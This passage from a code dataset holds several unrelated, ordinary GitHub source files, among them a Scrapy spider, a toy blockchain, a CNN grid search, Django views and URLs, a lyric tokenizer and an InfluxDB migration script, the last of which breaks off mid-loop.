.+)/@[0-9.,]+\"),\n }\n\n def start_requests(self):\n \"\"\"Parse the results from the hidden AJAX call, and start requests to parse the ads.\n\n @url https://www.city-wohnen.de\n @returns items 0 0\n @returns requests 1 200\n \"\"\"\n for url in self.start_urls:\n response = requests.get(url)\n results = response.json().get(\"results\")\n for link in re.compile(self.URL_REGEX).findall(results):\n yield Request(\"https://www.city-wohnen.de{}\".format(link), callback=self.parse_item)\n\n def parse_item(self, response):\n \"\"\"Parse a page with an apartment.\n\n @url https://www.city-wohnen.de/eng/berlin/32638-moeblierte-wohnung-berlin-friedrichshain-gruenberger-strasse\n @returns items 1 1\n @scrapes url title availability description neighborhood address warm_rent_price size rooms\n \"\"\"\n self.shutdown_on_error()\n item = ItemLoader(ApartmentItem(), response=response)\n item.add_value(\"url\", response.url)\n\n item.add_css(\"title\", \"div.text_data > h2::text\")\n item.add_css(\"availability\", \"div.row > div.text_data > p::text\")\n item.add_css(\"description\", \"div.object_details div.col_left p::text\")\n item.add_value(\n \"neighborhood\", response.css(\"div.object_meta div.container div.text_data p strong::text\").extract()[0]\n )\n item.add_xpath(\"address\", \"//li[@class='map']/a/@href\")\n\n keys = response.css(\"div.object_meta table.object_meta_data th::text\").extract()\n values = response.css(\"div.object_meta table.object_meta_data td::text\").extract()\n features = dict(zip(keys, values))\n item.add_value(\"warm_rent_price\", features.get(\"Rent\"))\n item.add_value(\"size\", features.get(\"Size\"))\n item.add_value(\"rooms\", features.get(\"Room/s\"))\n\n return item.load_item()\n\n def before_marshmallow(self, data: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Clean the item before loading schema on Marshmallow.\"\"\"\n for field, regex in self.field_regex.items():\n clean_field = data.get(field, \"\").strip(\" \\t\\n\")\n match = regex.match(clean_field)\n if not match:\n continue\n\n data.update(match.groupdict())\n if field == \"availability\":\n # Must be an ISO date for the database.\n data[\"availability\"] = datetime.strptime(data.get(\"availability\", \"\"), \"%d/%m/%Y\").date().isoformat()\n elif field == \"address\":\n # Decode the URL.\n data[\"address\"] = unquote_plus(data[\"address\"])\n\n return data\n","repo_name":"andreoliwa/scrapy-tegenaria","sub_path":"tegenaria/spiders/city_wohnen.py","file_name":"city_wohnen.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"2507028141","text":"import hashlib\nfrom datetime import datetime\nimport datetime\n\nclass Block():\n def __init__(self, timestamp, data, previous_hash):\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.calc_hash()\n self.prev = None\n\n def calc_hash(self):\n sha = hashlib.sha256()\n hash_str = self.data.encode('utf-8')\n sha.update(hash_str)\n return sha.hexdigest()\n\n def __repr__(self):\n s = ''\n s += \"Timestamp: \" + str(self.timestamp) + \"\\n\"\n s += \"Data: \" + str(self.data) + \"\\n\"\n s += \"SHA256 Hash: \" + str(self.hash) + \"\\n\"\n s += \"Prev_Hash: \" + str(self.previous_hash) + \"\\n\"\n assert type(s)== str\n return s\n\nclass Blockchain():\n def __init__(self): # initialize when creating a chain\n self.chain_head = self.block_zero()\n self.size = 1\n\n def block_zero(self):\n return 
Block(datetime.datetime.utcnow(),\n 'First', '0')\n\n def chain_block(self, data):\n new_block = Block(datetime.datetime.utcnow(), data,\n self.chain_head.hash)\n new_block.prev = self.chain_head\n self.chain_head = new_block\n self.size+=1\n\n def get_chain_size(self): # includes the genesis block\n return self.size\n\n def is_chain_consistent(self):\n head= self.chain_head\n flag = True\n idx = self.size -1\n while head.prev is not None :\n if head.prev.hash != head.previous_hash:\n flag = False\n print(f'Blocks {idx} and {idx-1} are inconsistent')\n if head.hash != head.calc_hash():\n flag = False\n print(f'Block {idx} hash is not consistent')\n if head.prev.timestamp >= head.timestamp:\n flag = False\n print(f'Wrong timestamp at block {idx}')\n idx-=1\n head=head.prev\n return flag\n\n def print_block(self):\n head= self.chain_head\n while head.prev is not None:\n print('-'*20)\n print(head)\n print('-'*20)\n head= head.prev\n\n\n\n\nif __name__ == '__main__':\n\n def test_blockchain(block_chain):\n block_chain.is_chain_consistent()\n\n\n block_chain = Blockchain()\n for i in range(1,3):\n block_chain.chain_block(data = f'Test block {i}')\n test_blockchain(block_chain)\n\n block_chain.print_block()\n\n\n #Additional testing\n # 1 same data\n block_chain = Blockchain()\n for i in range(1,3):\n block_chain.chain_block(data = f'Test block')\n test_blockchain(block_chain)\n\n # 2 Empty chain\n block_chain = Blockchain()\n test_blockchain(block_chain)\n","repo_name":"reneang17/data-structures-and-algorithms","sub_path":"show-me-the-data-structures/5_Blockchain_with_Linkedlist.py","file_name":"5_Blockchain_with_Linkedlist.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20328894080","text":"import statistics \nimport traceback\nimport pickle\n\nimport warnings\nimport os\n\nfrom sklearn.model_selection import KFold\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom models.cnn_builder import CNNBuilder\nfrom evaluation.multi_run_evaluation import MultiRunEvaluation\n\n# Remove some deprecation warnings from the output that disturb the experiment report.\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n\nclass GridSearch:\n    \"\"\"\n    This class implements grid search for CNN models. It enables testing different configurations of convolutional and fully connected layers. \n    \n    Other training parameters are fixed based on previous experiments (see overfitting_experimentation.ipynb)\n    \"\"\"\n\n    filename = \"evaluation/experiment_records/grid_search-{}_{}.pickle\"\n    test_filename = \"tests/grid_search-{}_{}.pickle\"\n\n\n    def __init__(\n        self,\n        in_shape,\n        out_shape,\n        convolutional_options,\n        fully_connected_options,\n        epochs=100,\n        nr_runs=10,\n        nr_splits=10,\n        is_test=False\n    ):\n        \"\"\"\n        Configures the grid search.\n\n        Each configuration will be tested for nr_runs * nr_splits times with max 100 epochs for each time.\n\n        Parameters:\n            in_shape -- the shape of the input of the network\n            out_shape -- the shape of the output of the network\n            convolutional_options -- A list of options for convolutional layers that are tested. This corresponds to the parameter \"convolutional_layers\" of the CNNBuilder\n            fully_connected_options -- A list of options for fully connected layers that are tested. 
This corresponds to the parameter \"fully_connected_layers\" of the CNNBuilder\n            epochs -- nr of epochs to run\n            nr_runs -- the number of runs to execute for each split\n            nr_splits -- the number of splits for the dataset.\n        \"\"\"\n        self.in_shape = in_shape\n        self.out_shape = out_shape\n        self.convolutional_options = convolutional_options\n        self.fully_connected_options = fully_connected_options\n        self.epochs = epochs\n        self.nr_runs = nr_runs\n        self.nr_splits = nr_splits\n        self.is_test = is_test\n        self.scores = list()\n\n\n    def run(self, X, y) -> list:\n        \"\"\"\n        Runs grid search. \n        The search tests all combinations of convolutional and fully connected shapes. For each of them it performs 10-fold cross validation and uses the average hamming score of the test set over all splits as comparison score.\n        The search stores checkpoints in evaluation/experiment_records/grid_search.pickle\n\n        Parameters:\n            X -- the training data. \n            y -- labels of the training data.\n        Returns:\n            A list of all tried combinations and their scores as tuple (cnn_configuration, fully connected configuration, score). The list is sorted by score.\n        \"\"\"\n        print(\"\\n\\nRUNNING GRID SEARCH ...\")\n\n        results = dict()\n        checkpoint = self.load_checkpoint()\n\n        print(f\"checkpoint: {checkpoint}\")\n\n        if checkpoint:\n            results[\"checkpoint\"] = checkpoint\n            result_length = len(results[\"checkpoint\"])\n\n            print(f\"Existing checkpoint loaded with {result_length} entries\")\n\n        kfold = KFold(n_splits=self.nr_splits, shuffle=True)\n\n        for cnn_config in self.convolutional_options:\n            for fc_config in self.fully_connected_options:\n                print(\"\\nTesting configuration:\")\n                print(f\"  - Convolutional part: {cnn_config}\")\n                print(f\"  - Connected part: {fc_config}\")\n\n\n                # Check to avoid retesting a tested combination:\n                config_key = \"(\"+str(cnn_config) + \",\" + str(fc_config) + \")\"\n\n                if config_key in results.keys():\n                    print(\"Skipping - already tested in checkpoint\")\n                    continue\n\n                test_hammings = []\n                split_counter = 1\n\n                for train_indices, test_indices in kfold.split(X=X):\n                    try:\n                        print(f\"\\nSplit {split_counter}/{self.nr_splits}\")\n                        split_counter+=1\n\n                        X_train = X[train_indices]\n                        y_train = y[train_indices]\n                        X_test = X[test_indices]\n                        y_test = y[test_indices]\n\n                        train_datagen = ImageDataGenerator(\n                            rotation_range=30, \n                            width_shift_range=0.1, \n                            height_shift_range=0.1, \n                            fill_mode=\"nearest\"\n                        )\n                        train_generator = train_datagen.flow(x=X_train, y=y_train)\n\n                        cnn_builder = CNNBuilder(\n                            convolutional_layers=cnn_config,\n                            fully_connected_layers=fc_config,\n                            in_shape=(self.in_shape),\n                            out_shape=self.out_shape\n                        )\n\n                        evaluator = MultiRunEvaluation(model_creation=cnn_builder.build_model)\n                        evaluator.evaluate(\n                            nr_runs=self.nr_runs,\n                            epochs=self.epochs,\n                            early_stopping_patience=5,\n                            train_generator=train_generator,\n                            X_train=X_train,\n                            y_train=y_train,\n                            X_test=X_test,\n                            y_test=y_test,\n                            verbose = 0\n                        )\n\n                        mean_test_hamming = MultiRunEvaluation.get_metrics_summary(\n                            values=evaluator.get_test_hamming_scores()\n                        )[\"mean\"]\n                        test_hammings.append(mean_test_hamming)\n\n                        # cleanup. 
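Free the per-split data, generator, model and evaluator before the next fold;\n                        # with many folds and configurations these would otherwise accumulate in memory.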
\n                        del X_train\n                        del y_train\n                        del X_test\n                        del y_test\n                        del train_datagen\n                        del train_generator\n                        del cnn_builder\n                        del evaluator\n\n                    except Exception as e:\n                        print(\"An exception occurred:\")\n                        traceback.print_exc()\n                        print(\"Resuming with next test...\")\n\n                score = statistics.mean(data=test_hammings)\n                print(f\"Score: {score}\")\n                \n                # update results and make a checkpoint\n                results[config_key] = (cnn_config, fc_config, score)\n                self.store_checkpoint(checkpoint=results)\n                \n\n        scores = list(results.values())\n\n        scores.sort(key=lambda tup: tup[2], reverse=True)\n        return scores\n\n\n    def store_checkpoint(self, checkpoint) -> None:\n        \"\"\"\n        store a checkpoint of the current results to a file where it can be loaded from if the experiment is interrupted\n        \n        Parameters:\n            checkpoint -- The checkpoint data to be stored.\n        \"\"\"\n        filename = GridSearch.filename.format(\n            str(self.convolutional_options),\n            str(self.fully_connected_options)\n        )\n        if self.is_test:\n            filename = GridSearch.test_filename.format(\n                str(self.convolutional_options),\n                str(self.fully_connected_options)\n            )\n        \n        with open(filename,\"wb\") as f:\n            pickle.dump(checkpoint,f,pickle.HIGHEST_PROTOCOL)\n\n\n    def load_checkpoint(self) -> list | None:\n        \"\"\"\n        load the last checkpoint\n        \"\"\"\n        filename = GridSearch.filename.format(\n            str(self.convolutional_options),\n            str(self.fully_connected_options)\n        )\n\n        if self.is_test:\n            filename = GridSearch.test_filename.format(\n                str(self.convolutional_options),\n                str(self.fully_connected_options)\n            )\n\n        if os.path.exists(path=filename):\n            with open(file=filename, mode=\"rb\") as f:\n                results = pickle.load(file=f)\n            return results\n        else:\n            print(f\"Checkpoint file {filename} does not exist!\") \n            return None\n\n\n    def remove_checkpoint(self) -> None:\n        \"\"\"\n        clean up the checkpoint data if it is not needed any more.\n        \"\"\"\n        filename = GridSearch.filename.format(\n            str(self.convolutional_options),\n            str(self.fully_connected_options)\n        )\n        if self.is_test:\n            filename = GridSearch.test_filename.format(\n                str(self.convolutional_options),\n                str(self.fully_connected_options)\n            )\n        \n        if os.path.exists(path=filename):\n            os.remove(path=filename)\n","repo_name":"frank-trollmann/machine-learning_example-project","sub_path":"evaluation/grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"36982250990","text":"# coding: utf-8\n\n\"\"\"\n    DocuSign REST API\n\n    The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.\n\n    OpenAPI spec version: v2\n    \n    Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass ServiceVersion(object):\n    \"\"\"\n    NOTE: This class is auto generated by the swagger code generator program.\n    Do not edit the class manually.\n    \"\"\"\n    def __init__(self, version=None, version_url=None):\n        \"\"\"\n        ServiceVersion - a model defined in Swagger\n\n        :param dict swaggerTypes: The key is attribute name\n                                  and the value is attribute type.\n        :param dict attributeMap: The key is attribute name\n                                  and the value is json key in definition.\n        \"\"\"\n        self.swagger_types = {\n            'version': 'str',\n            'version_url': 'str'\n        }\n\n        self.attribute_map = {\n            'version': 'version',\n            'version_url': 'versionUrl'\n        }\n\n        self._version = version\n        self._version_url = version_url\n\n    @property\n    
def version(self):\n \"\"\"\n Gets the version of this ServiceVersion.\n The version of the rest API.\n\n :return: The version of this ServiceVersion.\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"\n Sets the version of this ServiceVersion.\n The version of the rest API.\n\n :param version: The version of this ServiceVersion.\n :type: str\n \"\"\"\n\n self._version = version\n\n @property\n def version_url(self):\n \"\"\"\n Gets the version_url of this ServiceVersion.\n \n\n :return: The version_url of this ServiceVersion.\n :rtype: str\n \"\"\"\n return self._version_url\n\n @version_url.setter\n def version_url(self, version_url):\n \"\"\"\n Sets the version_url of this ServiceVersion.\n \n\n :param version_url: The version_url of this ServiceVersion.\n :type: str\n \"\"\"\n\n self._version_url = version_url\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"Alying/Fire-Detector","sub_path":"docusign_tools/docusign_esign/models/service_version.py","file_name":"service_version.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"75"} +{"seq_id":"14640125269","text":"import sys\n\n#print(len(sys.argv))\nfor i in range(1,len(sys.argv)):\n print(\"arg \", i, \": \", sys.argv[i])\n\nstates = [\"California\", \"Oregon\",\n \"Washington\", \"Texas\"]\n\nfor count, state in enumerate(states):\n print(\"state \", count, \": \", state)\n","repo_name":"CristianColdea/LCTHW","sub_path":"ex13.py","file_name":"ex13.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21347527296","text":"import numpy as np \nimport tensorflow as tf \n\nfrom model.input_data import InputImageProc\nfrom model.cnn import CNN\n\nif __name__ == '__main__':\n input_proc = InputImageProc()\n input_proc()\n\n train_img = np.load('./datasets/train/dataset.npy')\n train_label = np.load('./datasets/train/label_list.npy')\n \n create_model = CNN()\n cnn = create_model.cnn()\n cnn.fit(train_img, train_label, epochs=5)\n cnn.save('./model/ckpt/')\n\n valid_img = np.load('./datasets/valid/dataset.npy')\n valid_label = np.load('./datasets/valid/label_list.npy')\n valid_loss, valid_acc = cnn.evaluate(valid_img, valid_label, 
verbose=2)","repo_name":"shigematsu10/trace_classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33729112938","text":"from django.shortcuts import render, redirect\nfrom .models import Phone\n\ndef show_catalog(request):\n template = 'catalog.html'\n sort = request.GET.get('sort')\n all_phones = Phone.objects.all()\n if sort == 'name':\n all_phones = all_phones.order_by('name')\n elif sort == 'max_price':\n all_phones = all_phones.order_by('-price')\n elif sort == 'min_price':\n all_phones = all_phones.order_by('price')\n context = {'phones': all_phones}\n return render(request, template, context)\n\n\ndef show_product(request, slug):\n template = 'product.html'\n model = Phone.objects.get(slug__contains=slug)\n context = {'phone': model}\n return render(request, template, context)","repo_name":"Olesyazfc/django_homework","sub_path":"2.1-databases/work_with_database/phones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20165748346","text":"class Solution: \n def isValid(self, s:str) -> bool:\n \n stack = []\n brackets = { '}' : '{', ']' : '[', ')' : '(' }\n\n for chars in s: \n if chars in brackets:\n if stack and stack[-1] == brackets[chars]: \n stack.pop()\n else:\n return False\n else:\n stack.append(chars)\n return True if not stack else False","repo_name":"johnsroy/codingPractice","sub_path":"Easy/validParenthesis.py","file_name":"validParenthesis.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13504380299","text":"\"\"\"conf URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.auth.views import LogoutView\n\nfrom work import views\n\nhandler404 = views.custom_handler404\nhandler500 = views.custom_handler500\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.main_view),\n path('vacancies/', views.vacancies),\n path('vacancies/cat/', views.speciality),\n path('vacancies/', views.vacancy),\n path('companies/', views.company),\n path('login/', views.user_login, name='login'),\n path('register/', views.register, name='register'),\n path('logout/', LogoutView.as_view(), name='logout'),\n path('vacancies//send/', views.send, name='send'),\n path('mycompany/', views.mycompany, name='mycompany'),\n path('mycompany//', views.company_edit, name='company_edit'),\n path('mycompany/new/', views.company_new, name='company_new'),\n path('mycompany/vacancies/', views.vacancy_list, name='vacancy_list'),\n path('mycompany/vacancies/new/', views.vacancy_new, name='vacancy_new'),\n path('mycompany/vacancies//', views.vacancy_edit, name='vacancy_edit')\n ]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"kirandev01/Stepic_4_week","sub_path":"conf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39795676330","text":"#P4E7 JAVIER DURAN Pide una fecha, valida si es una fecha correcta y en caso \r\n# de serlo le he añadido al ejercicio que cambie el mes alfabeticamente.\r\n\r\ndia=int(input(\"Introduce un día:\"))\r\nmes=int(input(\"Introduce mes:\"))\r\naño=int(input(\"Introduce el año:\"))\r\nmesalpha={1:\"Enero\",2:\"Febrero\",3:\"Marzo\",4:\"Abril\",5:\"Mayo\",6:\"Junio\",7:\"Julio\",8:\"Agosto\",9:\"Septiembre\",10:\"Octubre\",11:\"Noviembre\",12:\"Diciembre\"}\r\nif mes>12 or año>2019 or(mes%2==0 and dia>=31 and mes<7) or (mes%2==1 and dia>=31 and mes>7):\r\n print(\"Fecha invalida\")\r\n\r\nelse:\r\n print(\"La fecha seleccionada es {} de {} del año {}\".format(dia,mesalpha[mes],año))","repo_name":"javivi595/practica3","sub_path":"Practica 3/P3E7.py","file_name":"P3E7.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12269960816","text":"import pandas as pd\nimport codecs\n\nfilename = \"jawiki-country.json.gz\"\ndf = pd.read_json(filename,compression='infer',lines=True)\n\nfilter = df[\"title\"] == \"イギリス\"\n\nans = df[filter].values\nans = ans[0][1]\nprint(ans)\n\nprint(ans,file=codecs.open('UK.txt', 'w', 'utf-8'))\n","repo_name":"twobooks/nlp100training","sub_path":"020.py","file_name":"020.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31736721472","text":"from simulation import Simulation\nfrom collections import OrderedDict\nimport matplotlib.pyplot as plt\nfrom numpy import linspace\n\nclass GraphSimulation(Simulation):\n def __init__(self, *args, **kwargs):\n Simulation.__init__(self, *args, **kwargs)\n self._lenses = OrderedDict()\n self._lens_index = {}\n self._lens_locked = False\n def pre_sim_routine(self, *args):\n super().pre_sim_routine(*args)\n self._lens_locked = True\n def add_lens(self, name, 
extractor):\n        if self._lens_locked:\n            raise ValueError('Locked, cannot add any more lenses now')\n        if name in self._lenses:\n            raise ValueError(f'Lens \"{name}\" already registered')\n        self._lenses[name] = extractor\n        self._lens_index[name] = len(self._lens_index)\n    def add_lenses(self, lenses):\n        for name, extractor in lenses:\n            self.add_lens(name, extractor)\n\n    def slice_data(self, xs, state, error): return [extr(xs, state, error) for extr in self._lenses.values()]\n\n    def extract_dataline(self, name):\n        if name not in self._lenses:\n            raise KeyError(f'Unknown lens \"{name}\"')\n        return self.recorded_data[:, self._lens_index[name]]\n\n    def plot(self, *names, start=0):\n        xs = linspace(start, start + self.total_time, num=self.steps)\n        for name in names:\n            dataline = self.extract_dataline(name)\n            label_name = name\n            # Force TeX if elements are used and it is not invoked\n            if '^' in name or '\\\\' in name or '_' in name:\n                if '$' not in name:\n                    label_name = f'${name}$'\n            plt.plot(xs, dataline, label=label_name)\n        plt.legend()\n        return plt\n\nerr_ext = lambda xs, state, err: err\nxs_ext = lambda index: lambda xs, state, err: xs[index]\nstate_ext = lambda key: lambda xs, state, err: state[key]\n\n# Example:\n#s = GraphSimulation('exp', *make_exponent(exponents))\n#s.add_lenses([f'{e}^x', xs_ext(i)] for i, e in enumerate(exponents))\n#s.simulate(steps=100, total_time=2)\n#s.plot('1^x', '2^x', '3^x', '4^x', start=1)\n\n\n\n","repo_name":"Yetikoy/variety","sub_path":"src/graph_simulation.py","file_name":"graph_simulation.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20843857071","text":"#!/usr/bin/env python3\n\n# Train a classifier (?)\n\nimport csv\nimport spacy\nfrom collections import Counter\n\ndata = []\nwith open(\"my_data.csv\", 'r') as dat:\n    csvreader = csv.reader(dat)\n    header = next(csvreader)\n    for row in csvreader:\n        data.append(row)\n\ncnt = Counter()\nfor song in data:\n    cnt[song[0]] += 1\n\n#print(cnt.most_common())\n# Rock: 94992 songs\n# Pop: 53858 songs\n# Rap: 17114 songs\n# Dance: 11895 songs\n# Country: 10630 songs\n\ndef get_only_genre(data, genre):\n    songs = []\n    for song in data:\n        if song[0].lower() == genre.lower():\n            songs.append(song)\n    return songs\n\n\n\nrap_data = get_only_genre(data, 'rap')\nrock_data = get_only_genre(data, 'rock')\npop_data = get_only_genre(data, 'pop')\ncountry_data = get_only_genre(data, 'country')\ndance_data = get_only_genre(data, 'dance')\n\n\n\n# Tokenize\n# Split and train on Words\n# Or sentences\n\n\"\"\"\n    This next part of the code will closely follow the code from the class lecture\n    on classification from 03-31-2022.\n\"\"\"\n\n\nnlp = spacy.load(\"en_core_web_sm\")\n# this line should make it not split on apostrophes\nnlp.tokenizer.rules = {key: value for key, value in nlp.tokenizer.rules.items() if \"'\" not in key and \"’\" not in key and \"‘\" not in key}\n\n# A function to get all the songs for a specific genre\n# the 'sentences' from the in class example will be the songs\n# where the 'authors' will be the genre\n\n\n# separate songs by genre before this lol\ndef get_songs(data, genre: str) -> list:\n    songs = []\n    for song in data:\n        lyrics = song[3]\n        lyrics = lyrics.replace(\"\\n\", \". 
\").replace(\"--\", \" -- \")\n #lyrics = lyrics.replace(\"'\", \"\")\n #lyrics is a string of the lyrics\n \n tokens = [token.text for token in nlp(lyrics)\n if not(token.text.isspace()\n or\n token.is_punct)]\n song_string = \" \".join(tokens)\n songs.append(song_string)\n filename = genre+\"_lyrics.txt\"\n with open(filename, \"w\") as outfile:\n outfile.write(\"\\n\".join(songs))\n # tokens are written to a .txt output file where each line is a new token\n # not sure if this is the best way to do it as not seperated by song\n\n'''this will eventually be used to create the tokens for the test data'''\n\n\n'''\nsongs.extend(tokens)\nwrite file with name 'genre' that contains songs\n'''\n\n'''\n going forward this function will instead just create a list of every token\n in all songs and then write that list to a .txt file which will then be\n used to train the model rather than running and keeping the results\n contained in this file.\n'''\nprint('Starting Rap songs!')\nrap_songs = get_songs(rap_data, 'rap')\n\nprint('\\nDone with Rap songs...Moving onto Rock!\\n')\nrock_songs = get_songs(rock_data, 'rock')\n\nprint('\\nDone with Rock songs...Moving onto Country!\\n')\ncountry_songs = get_songs(country_data, 'country')\n\nprint('\\nDone with Country songs...Moving onto Dance!\\n')\ndance_songs = get_songs(dance_data, 'dance')\n\nprint('\\nDone with Dance songs...Moving onto Pop!\\n')\npop_songs = get_songs(pop_data, 'pop')\n\n#print(len(rock_songs))\n\n#print(\"\\nRap Songs:\")\n#print(rap_songs)\n\n#print(\"\\nRock Songs:\")\n#print(rock_songs)\n\n#print(\"\\nCountry Songs:\")\n#print(country_songs)\n\n#print(\"\\nDance Songs:\")\n#print(dance_songs)\n\n#print(\"\\nPop Songs:\")\n#print(pop_songs)\n\n#print(pop_data[4][3])\n","repo_name":"agulick1/Genre-Classification","sub_path":"code/get_tokens.py","file_name":"get_tokens.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20419216215","text":"\"\"\"Script to convert an old-structure influxdb to a new one.\"\"\"\n\nimport argparse\nimport sys\n\nfrom typing import List\n\n\n# Based on code at\n# http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console\ndef print_progress(iteration: int, total: int, prefix: str = '',\n suffix: str = '', decimals: int = 2,\n bar_length: int = 68) -> None:\n \"\"\"Print progress bar.\n\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : number of decimals in percent complete (Int)\n barLength - Optional : character length of bar (Int)\n \"\"\"\n filled_length = int(round(bar_length * iteration / float(total)))\n percents = round(100.00 * (iteration / float(total)), decimals)\n line = '#' * filled_length + '-' * (bar_length - filled_length)\n sys.stdout.write('%s [%s] %s%s %s\\r' % (prefix, line,\n percents, '%', suffix))\n sys.stdout.flush()\n if iteration == total:\n print(\"\\n\")\n\n\ndef run(script_args: List) -> int:\n \"\"\"Run the actual script.\"\"\"\n from influxdb import InfluxDBClient\n\n parser = argparse.ArgumentParser(\n description=\"Migrate legacy influxDB.\")\n parser.add_argument(\n '-d', '--dbname',\n metavar='dbname',\n required=True,\n help=\"InfluxDB database name\")\n parser.add_argument(\n '-H', '--host',\n metavar='host',\n default='127.0.0.1',\n 
help=\"InfluxDB host address\")\n parser.add_argument(\n '-P', '--port',\n metavar='port',\n default=8086,\n help=\"InfluxDB host port\")\n parser.add_argument(\n '-u', '--username',\n metavar='username',\n default='root',\n help=\"InfluxDB username\")\n parser.add_argument(\n '-p', '--password',\n metavar='password',\n default='root',\n help=\"InfluxDB password\")\n parser.add_argument(\n '-s', '--step',\n metavar='step',\n default=1000,\n help=\"How many points to migrate at the same time\")\n parser.add_argument(\n '-o', '--override-measurement',\n metavar='override_measurement',\n default=\"\",\n help=\"Store all your points in the same measurement\")\n parser.add_argument(\n '-D', '--delete',\n action='store_true',\n default=False,\n help=\"Delete old database\")\n parser.add_argument(\n '--script',\n choices=['influxdb_migrator'])\n\n args = parser.parse_args()\n\n # Get client for old DB\n client = InfluxDBClient(args.host, args.port,\n args.username, args.password)\n client.switch_database(args.dbname)\n # Get DB list\n db_list = [db['name'] for db in client.get_list_database()]\n # Get measurements of the old DB\n res = client.query('SHOW MEASUREMENTS')\n measurements = [measurement['name'] for measurement in res.get_points()]\n nb_measurements = len(measurements)\n # Move data\n # Get old DB name\n old_dbname = \"{}__old\".format(args.dbname)\n # Create old DB if needed\n if old_dbname not in db_list:\n client.create_database(old_dbname)\n # Copy data to the old DB\n print(\"Cloning from {} to {}\".format(args.dbname, old_dbname))\n for index, measurement in enumerate(measurements):\n client.query('''SELECT * INTO {}..:MEASUREMENT FROM '''\n '\"{}\" GROUP BY *'.format(old_dbname, measurement))\n # Print progress\n print_progress(index + 1, nb_measurements)\n\n # Delete the database\n client.drop_database(args.dbname)\n # Create new DB if needed\n client.create_database(args.dbname)\n client.switch_database(old_dbname)\n # Get client for new DB\n new_client = InfluxDBClient(args.host, args.port, args.username,\n args.password, args.dbname)\n # Counter of points without time\n point_wt_time = 0\n\n print(\"Migrating from {} to {}\".format(old_dbname, args.dbname))\n # Walk into measurement\n for index, measurement in enumerate(measurements):\n\n # Get tag list\n res = client.query('''SHOW TAG KEYS FROM \"{}\"'''.format(measurement))\n tags = [v['tagKey'] for v in res.get_points()]\n # Get field list\n res = client.query('''SHOW FIELD KEYS FROM \"{}\"'''.format(measurement))\n fields = [v['fieldKey'] for v in res.get_points()]\n # Get points, convert and send 